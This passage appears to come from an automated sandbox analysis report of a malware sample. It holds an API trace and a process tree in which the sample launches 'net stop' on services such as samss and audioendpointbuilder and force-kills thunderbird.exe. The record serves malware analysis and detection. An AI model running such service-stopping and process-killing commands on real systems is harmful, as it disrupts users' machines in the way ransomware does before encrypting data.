Buffer=0x1afab4*=0x2957c88) returned 0x0 [0208.760] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afab0 | out: Buffer=0x1afab0*=0x2957ca0) returned 0x0 [0208.760] __iob_func () returned 0x76952608 [0208.760] _fileno (_File=0x76952608) returned 0 [0208.760] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0208.761] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0208.761] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0208.761] _wcsicmp (_String1="config", _String2="stop") returned -16 [0208.761] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0208.761] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0208.761] _wcsicmp (_String1="file", _String2="stop") returned -13 [0208.761] _wcsicmp (_String1="files", _String2="stop") returned -13 [0208.761] _wcsicmp (_String1="group", _String2="stop") returned -12 [0208.761] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0208.761] _wcsicmp (_String1="help", _String2="stop") returned -11 [0208.761] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0208.761] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0208.761] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0208.761] _wcsicmp (_String1="session", _String2="stop") returned -15 [0208.761] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0208.761] _wcsicmp (_String1=0x2a1ffc, _String2="stop") returned -15 [0208.761] _wcsicmp (_String1="share", _String2="stop") returned -12 [0208.761] _wcsicmp (_String1="start", _String2="stop") returned -14 [0208.761] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0208.761] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0208.761] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0208.761] _wcsicmp (_String1="accounts", _String2="audioendpointbuilder") returned -18 [0208.761] _wcsicmp (_String1="computer", _String2="audioendpointbuilder") returned 2 [0208.761] _wcsicmp (_String1="config", _String2="audioendpointbuilder") returned 2 [0208.761] _wcsicmp (_String1="continue", _String2="audioendpointbuilder") returned 2 [0208.761] _wcsicmp (_String1="cont", _String2="audioendpointbuilder") returned 2 [0208.761] _wcsicmp (_String1="file", _String2="audioendpointbuilder") returned 5 [0208.761] _wcsicmp (_String1="files", _String2="audioendpointbuilder") returned 5 [0208.761] _wcsicmp (_String1="group", _String2="audioendpointbuilder") returned 6 [0208.761] _wcsicmp (_String1="groups", _String2="audioendpointbuilder") returned 6 [0208.761] _wcsicmp (_String1="help", _String2="audioendpointbuilder") returned 7 [0208.761] _wcsicmp (_String1="helpmsg", _String2="audioendpointbuilder") returned 7 [0208.761] _wcsicmp (_String1="localgroup", _String2="audioendpointbuilder") returned 11 [0208.761] _wcsicmp (_String1="pause", _String2="audioendpointbuilder") returned 15 [0208.762] _wcsicmp (_String1="session", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="sessions", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="sess", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="share", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="start", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="stats", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="statistics", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="stop", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="time", _String2="audioendpointbuilder") returned 19 [0208.762] _wcsicmp (_String1="user", _String2="audioendpointbuilder") returned 20 [0208.762] _wcsicmp (_String1="users", _String2="audioendpointbuilder") returned 20 [0208.762] _wcsicmp (_String1="msg", _String2="audioendpointbuilder") returned 12 [0208.762] _wcsicmp (_String1="messenger", _String2="audioendpointbuilder") returned 12 [0208.762] _wcsicmp (_String1="receiver", _String2="audioendpointbuilder") returned 17 [0208.762] _wcsicmp (_String1="rcv", _String2="audioendpointbuilder") returned 17 [0208.762] _wcsicmp (_String1="netpopup", _String2="audioendpointbuilder") returned 13 [0208.762] _wcsicmp (_String1="redirector", _String2="audioendpointbuilder") returned 17 [0208.762] _wcsicmp (_String1="redir", _String2="audioendpointbuilder") returned 17 [0208.762] _wcsicmp (_String1="rdr", _String2="audioendpointbuilder") returned 17 [0208.762] _wcsicmp (_String1="workstation", _String2="audioendpointbuilder") returned 22 [0208.762] _wcsicmp (_String1="work", _String2="audioendpointbuilder") returned 22 [0208.762] _wcsicmp (_String1="wksta", _String2="audioendpointbuilder") returned 22 [0208.762] _wcsicmp (_String1="prdr", _String2="audioendpointbuilder") returned 15 [0208.762] _wcsicmp (_String1="devrdr", _String2="audioendpointbuilder") returned 3 [0208.762] _wcsicmp (_String1="lanmanworkstation", _String2="audioendpointbuilder") returned 11 [0208.762] _wcsicmp (_String1="server", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="svr", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="srv", _String2="audioendpointbuilder") returned 18 [0208.762] _wcsicmp (_String1="lanmanserver", _String2="audioendpointbuilder") returned 11 [0208.762] _wcsicmp (_String1="alerter", _String2="audioendpointbuilder") returned -9 [0208.762] _wcsicmp (_String1="netlogon", _String2="audioendpointbuilder") returned 13 [0208.762] _wcsupr (in: _String="audioendpointbuilder" | out: _String="AUDIOENDPOINTBUILDER") returned="AUDIOENDPOINTBUILDER" [0208.762] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x29606e8 [0208.766] GetServiceKeyNameW (in: hSCManager=0x29606e8, lpDisplayName="AUDIOENDPOINTBUILDER", lpServiceName=0x2c8c28, lpcchBuffer=0x1afa24 | out: lpServiceName="", lpcchBuffer=0x1afa24) returned 0 [0208.768] _wcsicmp (_String1="msg", _String2="AUDIOENDPOINTBUILDER") returned 12 [0208.768] _wcsicmp (_String1="messenger", _String2="AUDIOENDPOINTBUILDER") returned 12 [0208.768] _wcsicmp (_String1="receiver", _String2="AUDIOENDPOINTBUILDER") returned 17 [0208.768] _wcsicmp (_String1="rcv", _String2="AUDIOENDPOINTBUILDER") returned 17 [0208.768] _wcsicmp (_String1="redirector", _String2="AUDIOENDPOINTBUILDER") returned 17 [0208.768] _wcsicmp (_String1="redir", _String2="AUDIOENDPOINTBUILDER") returned 17 [0208.768] _wcsicmp (_String1="rdr", _String2="AUDIOENDPOINTBUILDER") returned 17 [0208.768] _wcsicmp (_String1="workstation", _String2="AUDIOENDPOINTBUILDER") returned 22 [0208.768] _wcsicmp (_String1="work", _String2="AUDIOENDPOINTBUILDER") returned 22 [0208.768] _wcsicmp (_String1="wksta", _String2="AUDIOENDPOINTBUILDER") returned 22 [0208.768] _wcsicmp (_String1="prdr", _String2="AUDIOENDPOINTBUILDER") returned 15 [0208.768] _wcsicmp (_String1="devrdr", _String2="AUDIOENDPOINTBUILDER") returned 3 [0208.768] _wcsicmp (_String1="lanmanworkstation", _String2="AUDIOENDPOINTBUILDER") returned 11 [0208.768] _wcsicmp (_String1="server", _String2="AUDIOENDPOINTBUILDER") returned 18 [0208.768] _wcsicmp (_String1="svr", _String2="AUDIOENDPOINTBUILDER") returned 18 [0208.768] _wcsicmp (_String1="srv", _String2="AUDIOENDPOINTBUILDER") returned 18 [0208.768] _wcsicmp (_String1="lanmanserver", _String2="AUDIOENDPOINTBUILDER") returned 11 [0208.768] _wcsicmp (_String1="alerter", _String2="AUDIOENDPOINTBUILDER") returned -9 [0208.768] _wcsicmp (_String1="netlogon", _String2="AUDIOENDPOINTBUILDER") returned 13 [0208.768] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="WORKSTATION") returned -22 [0208.768] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanWorkstation") returned -11 [0208.768] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SERVER") returned -18 [0208.768] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanServer") returned -11 [0208.768] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0208.768] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0208.768] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0208.769] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0208.769] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2960620 [0208.770] OpenServiceW (hSCManager=0x2960620, lpServiceName="AUDIOENDPOINTBUILDER", dwDesiredAccess=0x84) returned 0x2960738 [0208.770] ResolveDelayLoadedAPI () returned 0x73f29e60 [0208.771] ControlService (in: hService=0x2960738, dwControl=0x4, lpServiceStatus=0x1af9a0 | out: lpServiceStatus=0x1af9a0*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0208.771] GetLastError () returned 0x426 [0208.771] QueryServiceStatus (in: hService=0x2960738, lpServiceStatus=0x1af9a0 | out: lpServiceStatus=0x1af9a0*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0208.771] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x2952d78 [0208.771] wcscpy_s (in: _Destination=0x2952d94, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER" | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0208.771] CloseServiceHandle (hSCObject=0x2960620) returned 1 [0208.771] CloseServiceHandle (hSCObject=0x2960738) returned 1 [0208.772] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x1af984 | out: Buffer=0x1af984*=0x2960320) returned 0x0 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="WORKSTATION") returned -22 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanWorkstation") returned -11 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SERVER") returned -18 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanServer") returned -11 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0208.772] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0208.773] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0208.773] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0208.773] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0208.773] wcsncpy_s (in: _Destination=0x29604d6, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER", _MaxCount=0x14 | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0208.773] wcsncpy_s (in: _Destination=0x29604ac, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER", _MaxCount=0x14 | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0208.773] NetApiBufferFree (Buffer=0x2952d78) returned 0x0 [0208.773] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x1af8a4 | out: Buffer=0x1af8a4*=0x2962040) returned 0x0 [0208.773] OpenServiceW (hSCManager=0x29606e8, lpServiceName="AUDIOENDPOINTBUILDER", dwDesiredAccess=0xc) returned 0x2960878 [0208.773] QueryServiceStatus (in: hService=0x2960878, lpServiceStatus=0x1af8a8 | out: lpServiceStatus=0x1af8a8*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0208.773] GetServiceDisplayNameW (in: hSCManager=0x29606e8, lpServiceName="AUDIOENDPOINTBUILDER", lpDisplayName=0x2c7820, lpcchBuffer=0x1af884 | out: lpDisplayName="Windows Audio Endpoint Builder", lpcchBuffer=0x1af884) returned 1 [0208.774] NetApiBufferFree (Buffer=0x2962040) returned 0x0 [0208.774] CloseServiceHandle (hSCObject=0x2960878) returned 1 [0208.774] wcscpy_s (in: _Destination=0x2c7610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0208.774] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x23b0002 [0208.775] FormatMessageW (in: dwFlags=0x2800, lpSource=0x23b0002, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The Windows Audio Endpoint Builder service is not started.\r\n") returned 0x3c [0208.776] GetFileType (hFile=0x94) returned 0x2 [0208.776] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x1af7e0 | out: lpMode=0x1af7e0) returned 1 [0208.973] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0x1af7ec, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x1af7ec*=0x3c) returned 1 [0209.733] GetFileType (hFile=0x94) returned 0x2 [0209.733] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x1af7e0 | out: lpMode=0x1af7e0) returned 1 [0210.353] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af7ec, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x1af7ec*=0x2) returned 1 [0211.023] _ultow (in: _Dest=0xdc1, _Radix=1767620 | out: _Dest=0xdc1) returned="3521" [0211.023] FormatMessageW (in: dwFlags=0x2800, lpSource=0x23b0002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0211.023] GetFileType (hFile=0x94) returned 0x2 [0211.023] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x1af880 | out: lpMode=0x1af880) returned 1 [0212.207] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af88c, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x1af88c*=0x34) returned 1 [0212.525] GetFileType (hFile=0x94) returned 0x2 [0212.525] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x1af880 | out: lpMode=0x1af880) returned 1 [0213.687] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af88c, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x1af88c*=0x2) returned 1 [0214.127] NetApiBufferFree (Buffer=0x2957c88) returned 0x0 [0214.127] NetApiBufferFree (Buffer=0x2957ca0) returned 0x0 [0214.127] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"audioendpointbuilder\" /y" [0214.127] exit (_Code=2) Thread: id = 6803 os_tid = 0x76c4 Process: id = "44" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x64f46000" os_pid = "0x76e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM thunderbird.exe /F" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6811 os_tid = 0x76e8 Thread: id = 7163 os_tid = 0x7c1c Thread: id = 7605 os_tid = 0x82e8 Thread: id = 7675 os_tid = 0x8404 Thread: id = 7677 os_tid = 0x840c Process: id = "45" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1aef3000" os_pid = "0x76ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6812 os_tid = 0x76f0 Thread: id = 7224 os_tid = 0x7d10 Process: id = "46" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x140c9000" os_pid = "0x76fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x76e4" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6814 os_tid = 0x7700 Thread: id = 6866 os_tid = 0x77d0 Thread: id = 7016 os_tid = 0x79d4 Thread: id = 7105 os_tid = 0x7b34 Thread: id = 7119 os_tid = 0x7b6c Process: id = "47" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x58d50000" os_pid = "0x77d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0x76ec" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6867 os_tid = 0x77d8 Thread: id = 6920 os_tid = 0x784c Thread: id = 7025 os_tid = 0x79f4 Thread: id = 7120 os_tid = 0x7b70 Thread: id = 7121 os_tid = 0x7b74 Process: id = "48" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x2e6cf000" os_pid = "0x7ee4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0x76ec" cmd_line = "C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7340 os_tid = 0x7ee8 [0217.258] GetModuleHandleA (lpModuleName=0x0) returned 0x2a0000 [0217.258] __set_app_type (_Type=0x1) [0217.258] __p__fmode () returned 0x76953c14 [0217.258] __p__commode () returned 0x769549ec [0217.258] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2a6f20) returned 0x0 [0217.258] __getmainargs (in: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610, _DoWildCard=0, _StartInfo=0x2bf61c | out: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610) returned 0 [0217.258] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.259] GetConsoleOutputCP () returned 0x1b5 [0217.580] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2c6fa0 | out: lpCPInfo=0x2c6fa0) returned 1 [0217.580] SetThreadUILanguage (LangId=0x0) returned 0x24a0409 [0218.218] sprintf_s (in: _DstBuf=0x1afae4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0218.218] setlocale (category=0, locale=".437") returned="English_United States.437" [0218.220] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0218.220] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0218.220] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0218.220] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af88c, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0218.220] RtlAllocateHeap (HeapHandle=0x26b0000, Flags=0x0, Size=0x5e) returned 0x26b4230 [0218.220] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0218.221] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1af888 | out: Buffer=0x1af888*=0x26b83f8) returned 0x0 [0218.221] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1af884 | out: Buffer=0x1af884*=0x26b83c8) returned 0x0 [0218.221] __iob_func () returned 0x76952608 [0218.221] _fileno (_File=0x76952608) returned 0 [0218.221] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0218.221] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0218.221] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0218.221] _wcsicmp (_String1="config", _String2="stop") returned -16 [0218.221] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0218.221] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0218.221] _wcsicmp (_String1="file", _String2="stop") returned -13 [0218.221] _wcsicmp (_String1="files", _String2="stop") returned -13 [0218.221] _wcsicmp (_String1="group", _String2="stop") returned -12 [0218.221] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0218.221] _wcsicmp (_String1="help", _String2="stop") returned -11 [0218.221] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0218.221] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0218.221] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0218.221] _wcsicmp (_String1="session", _String2="stop") returned -15 [0218.221] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0218.221] 